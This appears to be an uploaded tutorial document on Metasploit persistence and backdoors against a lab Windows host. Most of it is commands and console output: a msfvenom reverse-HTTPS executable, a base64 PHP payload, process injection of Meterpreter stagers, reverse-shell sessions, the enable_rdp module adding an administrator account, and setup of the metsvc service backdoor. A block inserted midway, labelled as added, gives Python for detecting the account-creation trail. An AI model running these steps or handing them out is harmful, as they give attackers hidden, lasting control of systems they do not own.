Metasploit executable backdoor.docx
- Document ID: 8623623
- Uploaded: 2023-02-01
- Format: DOCX
- Pages: 14
- Size: 1.21MB
Metasploit executable backdoor
As long as the server is not shut down!
Everyone knows HTTP and HTTPS get through firewalls!
detach is the command that breaks the SESSION connection.
Php:
msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2
brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
The code above:
meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs
msf exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf post(payload_inject) >
msf post(payload_inject) > show options

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf post(payload_inject) > set LPORT 9999
LPORT => 9999
msf post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf post(payload_inject) > set SESSION 5
SESSION => 5
msf post(payload_inject) > exploit

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload into process: 1636
[*] Post module execution completed
msf post(payload_inject) > sessions

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf post(payload_inject) >
msf post(system_session) > show options

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf post(system_session) > set HANDLER true
HANDLER => true
msf post(system_session) > sessions

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf post(system_session) > set SESSION 5
SESSION => 5
msf post(system_session) > exploit

[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf post(system_session) > set TYPE bash
TYPE => bash
msf post(system_session) > exploit

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf post(system_session) > set TYPE python
TYPE => python
msf post(system_session) > exploit

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf post(system_session) > set LPORT 5555
LPORT => 5555
msf post(system_session) > exploit

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf post(system_session) >
Automatically enabling 3389:
Very simple: enter the module and set the account and password.
Fill in the port and the SESSION (the ID as shown below):
If the account and password cannot be added this way, go into the session's shell, add them there and add the account to the administrators group.
msf post(enable_rdp) > show options

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf post(enable_rdp) > set USERNAME test
USERNAME => test
msf post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf post(enable_rdp) > set SESSION 5
SESSION => 5
msf post(enable_rdp) > exploit

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] Setting user account for logon
[*]     Adding User: test with Password: test
[*]     Adding User: test to local group 'Remote Desktop Users'
[*]     Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf post(enable_rdp) >
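From the defender's side, an added example (not part of the original document) that correlates the account-creation and group-membership events the enable_rdp run above leaves in the Windows Security log: a new local user added to both 'Remote Desktop Users' and 'Administrators' within minutes of being created. Event IDs 4720 and 4732 are the standard Windows ones; the event records, the `SecEvent` type and the function name are constructed for this example.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable

@dataclass
class SecEvent:
    ts: datetime
    event_id: int    # 4720 = account created, 4732 = member added to local group
    subject: str     # account that performed the action
    target: str      # account created, or member added
    group: str = ""  # local group name (4732 only)

# The two groups enable_rdp adds its user to, as printed in the log above.
WATCHED_GROUPS = {"Remote Desktop Users", "Administrators"}

def find_rdp_backdoor_accounts(events: Iterable[SecEvent],
                               window: timedelta = timedelta(minutes=5)) -> dict[str, set[str]]:
    """Return {account: groups} for accounts created (4720) and then added,
    within `window`, to every group in WATCHED_GROUPS: the enable_rdp trail."""
    created: dict[str, datetime] = {}
    joined: dict[str, set[str]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.event_id == 4720:
            created[ev.target] = ev.ts
            joined[ev.target] = set()
        elif ev.event_id == 4732 and ev.target in created:
            if ev.ts - created[ev.target] <= window and ev.group in WATCHED_GROUPS:
                joined[ev.target].add(ev.group)
    return {acct: groups for acct, groups in joined.items() if groups == WATCHED_GROUPS}

# Constructed sample log: the sequence the module printed above (user "test"
# created by the SYSTEM session and added to both groups within seconds),
# plus a benign helpdesk account that only gets RDP access and is not flagged.
T0 = datetime(2012, 3, 22, 0, 31, 10)
SAMPLE_EVENTS = [
    SecEvent(T0, 4720, "SYSTEM", "test"),
    SecEvent(T0 + timedelta(seconds=1), 4732, "SYSTEM", "test", "Remote Desktop Users"),
    SecEvent(T0 + timedelta(seconds=2), 4732, "SYSTEM", "test", "Administrators"),
    SecEvent(T0 + timedelta(hours=2), 4720, "DIS9TEAM-A1\\brk", "helpdesk"),
    SecEvent(T0 + timedelta(hours=2, seconds=5), 4732, "DIS9TEAM-A1\\brk", "helpdesk", "Remote Desktop Users"),
]

if __name__ == "__main__":
    for acct, groups in find_rdp_backdoor_accounts(SAMPLE_EVENTS).items():
        print(f"suspicious account {acct!r}: created, then added to {sorted(groups)}")
```

The same correlation applies to the cleanup step: the resource file the module writes deletes the user, so a 4726 (account deleted) shortly after such a sequence is worth keeping in the same alert.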
msf post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf post(multi_meterpreter_inject) > exploit

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter into process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
Successfully obtained a SHELL.
brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
正在解析主机 www.phreedom.org... 66.45.226.226
正在连接 www.phreedom.org|66.45.226.226|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度: 55871 (55K) [application/zip]
正在保存至: “metsvc-1.0.zip”

100%[======================================>] 55,871      46.2K/s   花时 1.2s

2012-03-22 00:54:52 (46.2 KB/s) - 已保存 “metsvc-1.0.zip” [55871/55871])

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsvc.exe         README.txt  test.rb
metsrv.dll     metsvc-server.exe  src
brk@Dis9Team:/tmp/metsvc-1.0$